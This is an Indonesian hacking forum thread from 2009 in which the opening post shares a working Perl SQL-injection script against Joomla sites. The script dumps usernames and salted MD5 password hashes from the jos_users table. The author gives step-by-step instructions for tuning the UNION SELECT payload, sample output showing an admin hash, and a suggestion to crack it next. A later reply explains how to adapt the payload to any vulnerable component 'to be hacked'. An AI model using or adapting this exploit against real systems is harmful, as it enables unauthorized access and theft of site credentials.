Perl simple joomla SQL Injection

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
User avatar
franky_muchtar
Posts: 30
Joined: Sun May 04, 2008 11:17 pm

Perl simple joomla SQL Injection

Post by franky_muchtar » Sat Jul 04, 2009 7:19 am

Ini adalah simple joomla SQL Injection yang dapat memunculkan bentuk password md5 dan md5salt serta kita bisa menentukan baris keberapa dari tabel jos_usernya...

Code: Select all

#!/usr/bin/perl -w
print "\t\t############################################################\n\n";
print "\t\t#                                       Joomla SQL Injection                                             #\n\n";
print "\t\t############################################################\n\n";
use LWP::UserAgent;
die "Contoh: perl $0 'http://joomla_web.com/path/index.php?option=com_contoh&id=1' 'baris_dari_pass'\n" unless @ARGV;
$user="username";
$pass="password";
$tabel="jos_users";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$host = $ARGV[0] . 
"+AND+1=2+union+all+select+1,concat(CHAR(60,117,115,101,114,62),".$user.",CHAR(60,117,115,101,114,62),CHAR(60,112,97,115,115,62),".$pass.",CHAR(60,112,97,115,115,62)),3,4,5+from+".$tabel."+LIMIT+".$ARGV[1].",1--";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
if ($answer =~ /<user>(.*?)<user>/){
        print "\n[+] Username : $1";
}
if ($answer =~/<pass>(.*?)<pass>/){
        print "\n[+] password : $1\n\n";
        print "\t\t#   berhasil   #\n\n";}
else{print "\n[-] gagal...\n";}
yang perlu dilakukan adalah menentukan banyaknya colom yang ada dan nomor yang muncul berapa
misalnya :
1. target adalah http://joomla_web.com/path/index.php?option=com_contoh&id=1
2. banyaknya colom adalah 5 ===>+AND+1=2+UNION+SELECT+1,2,3,4,5--
3. nomor yang muncul adalah 2 ===>+AND+1=2+UNION+SELECT+1,concat(CHAR(60,117,115,101,114,62),".$user.",CHAR(60,117,115,101,114,62),CHAR(60,112,97,115,115,62),".$pass.",CHAR(60,112,97,115,115,62)),3,4,5--
lalu menggunaknnnya
perl joomla.pl 'http://joomla_web.com/path/index.php?option=com_contoh&id=1' '0'
keterangan :
joomla.pl ==>nama file
'http://joomla_web.com/path/index.php?option=com_contoh&id=1' ==>joomla yg vuln
'0' ==>row pertama / baris pertama dari tabel jos_usernya, untuk ke dua ganti dengan '1', n seterusnya
Jika berhasil maka akan seperti ini

############################################################

# Joomla SQL Injection #


############################################################


[+] Username : admin
[+] password : faae726c2d28d65735ba190c5b249e54:G9A9HKtr7Go3xuBZRTUjIz0ufiyOBd8A

# berhasil #

sekarang tinggal mengcrack md5 salt nya deh...

User avatar
metropolix
Posts: 6
Joined: Wed Aug 13, 2008 3:45 am
Location: *.exe
Contact:

Re: Perl simple joomla SQL Injection

Post by metropolix » Sat Jul 04, 2009 9:13 am

thx 4 da sharing ... 8)
ORANG YG MERASA DIRINYA PINTAR ADALAH SEBENARNYA ORANG YG SANGAT BODOH!! :)

User avatar
shad.hckr
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr
Contact:

Re: Perl simple joomla SQL Injection

Post by shad.hckr » Sat Jul 04, 2009 9:59 pm

kayaknya lebih simple nih..
tapi berhubung ga pake linux terpaksa jalanin di shell.. wkwkwkwk

N4ck0
Posts: 65
Joined: Tue Mar 03, 2009 9:57 pm
Location: Under
Contact:

Re: Perl simple joomla SQL Injection

Post by N4ck0 » Sat Jul 04, 2009 10:08 pm

wahh perl buat joomla yah

itu g khusus buat component joomla 1 z kan.?

User avatar
franky_muchtar
Posts: 30
Joined: Sun May 04, 2008 11:17 pm

Re: Perl simple joomla SQL Injection

Post by franky_muchtar » Mon Jul 06, 2009 7:35 am

@N4ck0
itu bisa untuk semua component joomla kok, kita tinggal mengedit bagian yang ini

Code: Select all

"+AND+1=2+union+all+select+1,concat(CHAR(60,117,115,101,114,62),".$user.",CHAR(60,117,115,101,114,62),CHAR(60,112,97,115,115,62),".$pass.",CHAR(60,112,97,115,115,62)),3,4,5+from+".$tabel."+LIMIT+".$ARGV[1].",1--";
Sesuaikan dengan vuln component joomla yang akan di hack..

User avatar
wiLMaR_kiDz
Posts: 964
Joined: Fri Mar 27, 2009 1:03 pm
Location: internet
Contact:

Re: Perl simple joomla SQL Injection

Post by wiLMaR_kiDz » Mon Jul 06, 2009 10:07 pm

okedeh....cb dlu...
thank shareny..... :mrgreen: :mrgreen:
regards,
ordinary user,-

User avatar
adi0ranye
Posts: 6
Joined: Sun Dec 28, 2008 7:51 pm

Re: Perl simple joomla SQL Injection

Post by adi0ranye » Sun Jul 12, 2009 4:17 pm

Sayangnya untuk mengcrark hash dan salt joomla susah ya bro????

N4ck0
Posts: 65
Joined: Tue Mar 03, 2009 9:57 pm
Location: Under
Contact:

Re: Perl simple joomla SQL Injection

Post by N4ck0 » Fri Jul 31, 2009 8:24 pm

ngelih wrote:@N4ck0
itu bisa untuk semua component joomla kok, kita tinggal mengedit bagian yang ini

Code: Select all

"+AND+1=2+union+all+select+1,concat(CHAR(60,117,115,101,114,62),".$user.",CHAR(60,117,115,101,114,62),CHAR(60,112,97,115,115,62),".$pass.",CHAR(60,112,97,115,115,62)),3,4,5+from+".$tabel."+LIMIT+".$ARGV[1].",1--";
Sesuaikan dengan vuln component joomla yang akan di hack..

bgtu yah
thx yah

/me mau coba dulu

User avatar
franky_muchtar
Posts: 30
Joined: Sun May 04, 2008 11:17 pm

Re: Perl simple joomla SQL Injection

Post by franky_muchtar » Wed Aug 19, 2009 7:44 am

Silahkan bos....

Post Reply

Return to “Web Hacking”